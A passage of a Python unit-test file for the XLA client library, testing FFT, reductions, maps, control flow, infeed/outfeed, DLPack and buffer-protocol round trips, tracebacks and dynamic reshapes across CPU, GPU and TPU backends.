ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=in_dtype)).with_major_to_minor_layout_if_absent())
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_lt_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
def testReduceWindowVariadic(self):
c = self._NewComputation("reducer")
shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
shape = shape.with_major_to_minor_layout_if_absent()
ps = [ops.Parameter(c, i, shape) for i in range(4)]
which = ops.Ge(ps[0], ps[2])
ops.Tuple(
c, [ops.Select(which, ps[0], ps[2]),
ops.Select(which, ps[1], ps[3])])
reducer = c.build()
key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operands=[ops.Constant(c, key_array),
ops.Constant(c, val_array)],
init_values=[
ops.Constant(c, np.int32(0)),
ops.Constant(c, np.int32(0))
],
computation=reducer,
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = xla_client.OpSharding.Type.REPLICATED
sharding.tile_assignment_dimensions = [1]
sharding.tile_assignment_devices = [0]
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
self.cpu_backend = (
self.backend
if self.backend.platform == "cpu" else xla_client.make_cpu_client())
self.gpu_backend = (
self.backend if self.backend.platform == "gpu" else None)
def tearDown(self):
super().tearDown()
del self.backend
del self.cpu_backend
del self.gpu_backend
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}_gpu={}".format(
FormatShapeAndDtype(shape, dtype), take_ownership, gpu),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership,
"gpu": gpu
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True]
for gpu in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership, gpu):
if gpu and self.gpu_backend is None:
raise unittest.SkipTest("Test not running with GPU support")
backend = self.gpu_backend if gpu else self.cpu_backend
if dtype == np.bool_:
x = np.random.randint(0, 2, size=shape).astype(np.bool_)
else:
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(
dlt, self.cpu_backend, self.gpu_backend)
np.testing.assert_array_equal(
x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
class ClientTest(ComputationTest):
def setUp(self):
super(ClientTest, self).setUp()
self.backend = xla_backend()
def testPlatformVersion(self):
version = self.backend.platform_version
logging.info("platform_version:\n%s", version)
if self.backend.platform == "cpu":
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "gpu":
# Following is false if not built with --config=cuda
if test_util.is_gpu_available(cuda_only=True):
self.assertTrue(
re.match(r"^cuda \d{4,}$", version),
msg=f"Expected CUDA version string; got {repr(version)}")
else:
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "tpu" and not cloud_tpu:
self.assertIn("tpu", version.lower())
self.assertIn("cl/", version)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
def testExecutableSerialization(self):
if self.backend.platform != "tpu":
self.skipTest("Test requires tpu platform")
c = self._NewComputation()
ops.Add(
ops.Constant(c, NumpyArrayS32([1, 2])),
ops.Constant(c, NumpyArrayS32([3, 4])))
options = xla_client.CompileOptions()
executable = self.backend.compile(c.build(), options)
self.assertLen(executable.hlo_modules(), 1)
serialized = self.backend.serialize_executable(executable)
deserialized = self.backend.deserialize_executable(
serialized,
executable.hlo_modules()[0], options)
expected, = xla_client.execute_with_python_values(executable, (),
self.backend)
actual, = xla_client.execute_with_python_values(deserialized, (),
self.backend)
self.assertTrue(np.all(actual == expected))
tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
"""Tests related to DynamicReshape."""
def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
test_fn):
compiled = self.backend.compile(builder.build())
output_buffers = compiled.execute([
self.backend.buffer_from_pyval(
arg, device=compiled.local_devices()[0]) for arg in args
])
self.assertLen(output_buffers, len(expected_results))
for buf, expected in zip(output_buffers, expected_results):
to_py_result = buf.to_py()
self.assertEqual(expected.shape, to_py_result.shape)
test_fn(expected, to_py_result)
if self.backend.platform == "cpu" and buf.dtype != bfloat16:
mview = memoryview(buf)
self.assertEqual(expected.shape, mview.shape)
test_fn(expected, np.asarray(mview))
else:
# Buffer protocol expected to fail on non-cpu platforms and bfloat16
# Note that np.asarray(buf) doesn't throw an exception. To test if the
# error was thrown properly we must use memoryview(buf).
with self.assertRaises(BufferError):
memoryview(buf)
# 1D reshape of full size, half size, and size of 0.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.parameters((5), (3), (0))
def testReshape1D(self, reshape_size):
full_size = 5
c = self._NewComputation()
arg = np.array(reshape_size, dtype=np.int32)
expected = np.array(range(reshape_size), dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
ops.DynamicReshape(
ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
[True])
self._CompareToPyAndBufferProtocol(c, [arg], [expected],
np.testing.assert_equal)
  # 2D reshape with a slice on the minor dimension. We test different types
# where the strides may differ between the host and devices. The reshaped
# physical memory layout is not consecutive, and we test if the program can
# return the correct logical view of the data.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
